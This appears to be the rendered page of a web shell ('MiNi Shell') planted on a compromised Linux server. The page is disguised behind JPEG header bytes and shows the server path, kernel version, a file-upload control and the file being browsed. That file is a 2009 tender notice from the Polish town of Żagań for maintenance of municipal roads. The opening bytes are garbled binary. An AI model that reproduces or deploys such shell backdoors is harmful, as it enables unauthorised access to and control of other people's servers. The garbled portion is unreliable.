JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/161865-N-2009.html

<p class="kh_header"><b>Żagań: BIEŻĄCE UTRZYMANIE DRÓG GMINNYCH, DRÓG POŁOŻONYCH NA GRUNTACH KOMUNALNYCH W ŻAGANIU</b><br>
<b>Numer ogłoszenia: 161865 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 068 4771040, faks 068 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BIEŻĄCE UTRZYMANIE DRÓG GMINNYCH, DRÓG POŁOŻONYCH NA GRUNTACH KOMUNALNYCH W ŻAGANIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres prac przewidzianych do wykonania obejmuje : 
   Wykonanie wszystkich prac remontowych związanych z utrzymaniem nawierzchni 
   jezdni i chodników  i poboczy oraz oznakowania pionowego i  poziomego na  
   drogach  gminnych i drogach  położonych na gruntacH  komunalnych w Żaganiu. 
   Zakres prac obejmuje w szczególności :   
     - remonty bieżące nawierzchni jezdni asfaltowych, betonowych i gruntowych;  
     - remonty bieżące chodników, poboczy i innych elementów drogi,
     - prowadzenie prac związanych z likwidacją barier architektonicznych na 
       ciągach pieszych, 
    - remonty istniejącego oznakowania pionowego; 
    - wykonywanie bieżących odnowień oznakowania poziomego; 
    - montaż nowych znaków drogowych w ramach wprowadzanych zmian w 
      istniejącej organizacji ruchu.
      Wykaz dróg gminnych i dróg położonych na gruntach komunalnych w Żaganiu 
      stanowi załącznik nr 1 do projektu umowy.
2. Ponadto Wykonawca będzie zobowiązany do : 
     - nieodpłatnego przechowywania  materiałów depozytowych stanowiących 
       mienie Gminy Żagań o statusie miejskim, a pozyskiwanych wykorzystywanych 
       do remontów dróg oraz oznakowania pionowego służącego do wprowadzenia 
       czasowej organizacji ruchu; 
     - do przedstawienia - do 25 każdego miesiąca - rzeczowego zakresu prac do 
       realizacji w następnym miesiącu. Przedmiotowy zakres podlegać będzie 
       zatwierdzeniu przez Zamawiającego i określeniu maksymalnej kwoty
       zamówienia;
     - posiadania na stanie podstawowego zestawu znaków drogowych , które w    
       razie konieczności będzie można natychmiast uzupełniać;
     - przeprowadzenia zamówienia publicznego na zakup materiałów  niezbędnych 
       do realizacji prac tj. w szczególności znaków drogowych,  materiałów do   
       remontu nawierzchni asfaltowej, płytek chodnikowych itp.; 
     - posiadania niezbędnego oznakowania koniecznego do zabezpieczenia 
       miejsca prowadzenia prac w pasie drogowym dróg gminnych (znaki 
       drogowe, zapory itp.); 
     - ciągłe posiadania na stanie pewnej ilości  płytek betonowych, kostki 
       betonowej w różnych kształtach i kolorach  niezbędnych do uzupełnienia 
       chodników;
3. W celu natychmiastowego podjęcia czynności związanych z usuwaniem 
    zagrożeń na drogach, Wykonawca powinien zapewnić pełną dyspozycyjność - 
    maksymalnie w  ciągu jednej godziny od zgłoszenia interwencji przez 
    Zamawiającego oraz utrzymywać całodobową dyspozycyjność osób 
    odpowiedzialnych za realizację robót drogowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6, 45.23.32.62-3, 45.23.32.90-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE ŻĄDA OD WYKONAWCY WNIESIENIA WADIUM<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 
    określone w art.22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo Zamówień 
    Publicznych (tekst jednolity  Dz. U. z 2007r. Nr 223, poz.1655 z późn.zm.)  oraz  
    w Specyfikacji Istotnych Warunków Zamówienia. Za spełniających warunki 
    uznaje się Wykonawców, którzy : 
        a) posiadają uprawnienia do wykonywania określonej działalności lub 
            czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
        b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem 
            technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
            pisemne zobowiązanie innych podmiotów  do udostępnienia potencjału 
            technicznego i osób zdolnych do wykonania zamówienia: 
          - muszą posiadać doświadczenie w prowadzeniu prac związanych z 
            remontami dróg i dysponować osobą  posiadającą przygotowanie 
            zawodowe do pełnienia samodzielnych funkcji technicznych w  
            budownictwie, 
          - muszą posiadać sprzęt do remontu nawierzchni asfaltowych  (urządzenia 
            do przerobu starej masy asfaltowej lub urządzenie do remontu nawierzchni 
            przy użyciu emulsji i grysu),  
          - muszą być  dyspozycyjni w stosunku do Zamawiającego  maksymalnie 
            w ciągu jednej godziny od zgłoszenia interwencji- usuwanie
            stwierdzonych zagrożeń na drogach,
          - muszą posiadać możliwość utrzymania całodobowej dyspozycyjności 
            pracowników odpowiedzialnych za realizację prac drogowych oraz 
            podjęcia natychmiastowych działań związanych z usunięciem 
            powstałego zagrożenia na drogach gminnych;
      c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
           zamówienia,
       d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez 
    Zamawiającego na zasadzie  spełnia/nie spełnia. W przypadku niespełnienia  
    jakiegokolwiek warunku udziału w postępowaniu  Wykonawca zostanie 
    wykluczony z postępowania na podstawie art. 24 ustawy.
3. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca 
    jest zobowiązany dostarczyć następujące oświadczenia oraz dokumenty:
  a)Oświadczenie Wykonawcy, że :
       - posiada uprawnienia  do wykonywania określonej działalności lub
          czynności,   jeżeli  ustawy nakładają obowiązek posiadania takich
          uprawnień,         
       - posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem 
         technicznym i osobami zdolnymi do wykonania  zamówienia lub 
         przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia 
         potencjału technicznego i osób zdolnych do wykonania zamówienia - 
         zgodnie z zapisem punktu 1. litera b z opisu warunków udziału w 
          postępowaniu,
       - znajduje się w sytuacji  ekonomicznej i finansowej zapewniającej 
         wykonanie zamówienia,
       - nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
        W przypadku wspólnego ubiegania się /konsorcjum/ oświadczenie składa 
        każdy z Wykonawców oddzielnie. 
2. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania 
    określonej działalności lub czynności Wykonawca jest  zobowiązany złożyć 
    następujące dokumenty:  
a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie owpisie do 
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu  do 
    rejestru lub zgłoszenia do ewidencji działalności  gospodarczej,  wystawionego 
    nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert. W 
    przypadku wspólnego ubiegania się każdy konsorcjant składa oddzielnie.
b) Wykaz  wykonanych robót w okresie ostatnich pięciu lat przed dniem wszczęcia 
    postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności 
    jest krótszy- w tym okresie, odpowiadających  swoim rodzajem i wartością 
    robotom budowlanym stanowiącym  przedmiot  zamówienia, z podaniem ich 
    wartości przedmiotu, daty i  miejsca wykonania  oraz z   załączeniem 
    dokumentów  potwierdzających   iż roboty te zostały wykonane należycie. W 
    przypadku wspólnego ubiegania się wystarczające jest złożenie w/w dokumentu 
    przez jednego z  konsorcjantów.
c) Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i 
    które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na 
    temat ich kwalifikacji zawodowych,  doświadczenia i wykształcenia  niezbędnych 
    do  wykonania zamówienia, a także zakresu wykonywanych przez nie 
    czynności,  lub  pisemne zobowiązanie innych podmiotów do udostępnienia 
    osób   zdolnych do wykonania zamówienia, jeżeli takie osoby zostały wskazane 
    w wykazie. W przypadku wspólnego ubiegania się wystarczające jest złożenie 
    w/w  dokumentu przez jednego z konsorcjantów.
d) Dokumenty stwierdzające, że co najmniej 1 osoba, która będzie uczestniczyć w 
    wykonywaniu  zamówienia, posiada wymagane  uprawnienia  zawodowe do 
    wykonywania samodzielnych funkcji w specjalności drogowej. W przypadku 
    wspólnego ubiegania się wystarczające jest złożenie w/w dokumentu przez 
    jednego z konsorcjantów. 
 e) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi 
     dysponuje lub będzie dysponował wykonawca  /dysponowanie  sprzętem do 
     remontu nawierzchni asfaltowych, urządzenia do przerobu  starej masy 
     asfaltowej lub urządzenie do remontu nawierzchni przy  użyciu emulsji i grysu/;
     Jeżeli Wykonawca  wskaże w przedmiotowym wykazie  narzędzia i urządzenia, 
     którymi Wykonawca będzie dysponował, Wykonawca  załącza do wykazu 
     pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do 
     wykonania zamówienia narzędzi i urządzeń. W przypadku wspólnego ubiegania 
     się wystarczające jest złożenie w/w dokumentu przez jednego z 
     konsorcjantów. 
3.  W celu potwierdzenia warunku znajdowania się przez Wykonawcę w sytuacji 
     ekonomicznej i finansowej zapewniającej wykonanie zamówienia,  Wykonawca 
     jest zobowiązany złożyć następujące dokumenty:  
a) Aktualną polisę, a w przypadku jej braku  inny aktualny dokument
    potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
    w zakresie prowadzonej  działalności. W przypadku wspólnego ubiegania się  
    wystarczające jest złożenie w/w dokumentu przez jednego z konsorcjantów.
4. Jeżeli  Wykonawca ma siedzibę  lub miejsce zamieszkania poza terytorium 
    Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 2 lit. 
    a  składa dokument lub dokumenty, wystawione w kraju, w  którym  ma siedzibę 
    lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
        - nie otwarto jego likwidacji ani nie ogłoszono upadłości.
    Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed 
    upływem terminu składania ofert.   
4.1. Jeżeli w kraju pochodzenia osoby lub kraju,  w którym Wykonawca ma siedzibę 
       lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej  
       zastępuje się je dokumentem zawierającym oświadczenie  złożone przed 
       notariuszem, właściwym organem sądowym, administracyjnym  albo organem 
       samorządu zawodowego  lub gospodarczego odpowiednio kraju pochodzenia 
       osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.  
5. Dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej za 
    zgodność z oryginałem  przez Wykonawcę, zgodnie z zasadą reprezentacji 
    wykonawcy wskazaną w dokumencie  rejestrowym  Wykonawcy albo poprzez 
    osobę umocowaną w sposób właściwy do dokonania czynności poświadczenia 
    dokumentów za zgodność oryginałem. 
6. Zamawiający wzywa Wykonawców, którzy w określonym terminie nie  złożyli 
    wymaganych przez zamawiającego oświadczeń oraz dokumentów
    potwierdzających spełnienie warunków udziału w postępowaniu, lub  którzy nie  
    złożyli stosowych  pełnomocnictw, albo którzy złożyli wymagane przez 
    zamawiającego oświadczenia i dokumenty  potwierdzające spełnienie warunków 
    udziału w postępowaniu, zawierające błędy lub którzy złożyli wadliwe 
    pełnomocnictwa,  do ich złożenia  w wyznaczonym terminie, chyba że mimo ich 
    złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby 
    unieważnienie postępowania. Złożone na wezwanie Zamawiającego 
    oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę 
    warunków udziału w   postępowaniu oraz spełnienie przez oferowane usługi 
    wymagań  określonych przez zamawiającego, nie później niż w dniu, w którym 
    upłynął termin składania ofert.
7. Zamawiający wzywa także, w wyznaczonym, przez siebie terminie do  złożenia 
    wyjaśnień dotyczących oświadczeń i dokumentów niezbędnych do 
    przeprowadzenia postępowania / spełnienie wymagań określonych przez  
    Zamawiającego/..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zagan.pl  przetargi publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żagań, 68-100 Żagań, Plac Słowiański 17, Wydział Kontroli i  Zamówień Publicznych -pokój nr 26..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 11:00, miejsce: Urząd Miasta Żagań, 68-100 Żagań, Plac Słowiański 17, pok nr 26.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com